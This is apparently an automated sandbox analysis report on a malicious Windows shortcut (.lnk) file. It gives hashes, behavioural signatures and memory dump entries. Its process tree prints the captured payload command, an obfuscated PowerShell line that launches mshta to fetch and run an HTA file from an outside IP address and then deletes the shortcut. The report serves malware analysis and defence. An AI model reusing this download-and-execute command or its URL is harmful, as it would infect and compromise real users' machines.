Resubmissions

21-06-2024 17:47

240621-wdak4syenc 10

17-06-2024 01:02

240617-bd377swhrc 10

Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    17-06-2024 01:02

General

  • Target

    9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk

  • Size

    30KB

  • MD5

    3deb98c1970c8ed0d95086d79e579231

  • SHA1

    bc8b9ae3e0e278c69d100d30333dc380fc7fe57a

  • SHA256

    9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4

  • SHA512

    e25073a88ac942f2aee7f57de6bd51b3b0dbf9caa0c5b569f603315cae5de2ce9308fa974f44b8a24b5cc661f8f152cdfc5ee985f7e388319d2ec4059cc28630

  • SSDEEP

    24:8l/BHYVKVWuMs4ds+/CWLC7SfW8g/kwCYmaHKPeFI:815aTDds7S7gzTmE

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\9f07c02b13a50bb84630841a7a9876c9ced2ab66d406c54f4673c88e7cd70bb4.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1700
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" . $env:C:\W*\S*2\m*h?a.* 'http://198.23.201.89/warm/wow123.hta';$CaHn = Get-Location;$CaHn = Join-Path $CaHn '13820099133-PHOTO.lnk';del $CaHn
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2772

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2772-38-0x000007FEF605E000-0x000007FEF605F000-memory.dmp
    Filesize

    4KB

  • memory/2772-39-0x000000001B610000-0x000000001B8F2000-memory.dmp
    Filesize

    2.9MB

  • memory/2772-40-0x0000000002780000-0x0000000002788000-memory.dmp
    Filesize

    32KB

  • memory/2772-41-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB

  • memory/2772-42-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB

  • memory/2772-43-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB

  • memory/2772-44-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB

  • memory/2772-45-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB

  • memory/2772-46-0x000007FEF5DA0000-0x000007FEF673D000-memory.dmp
    Filesize

    9.6MB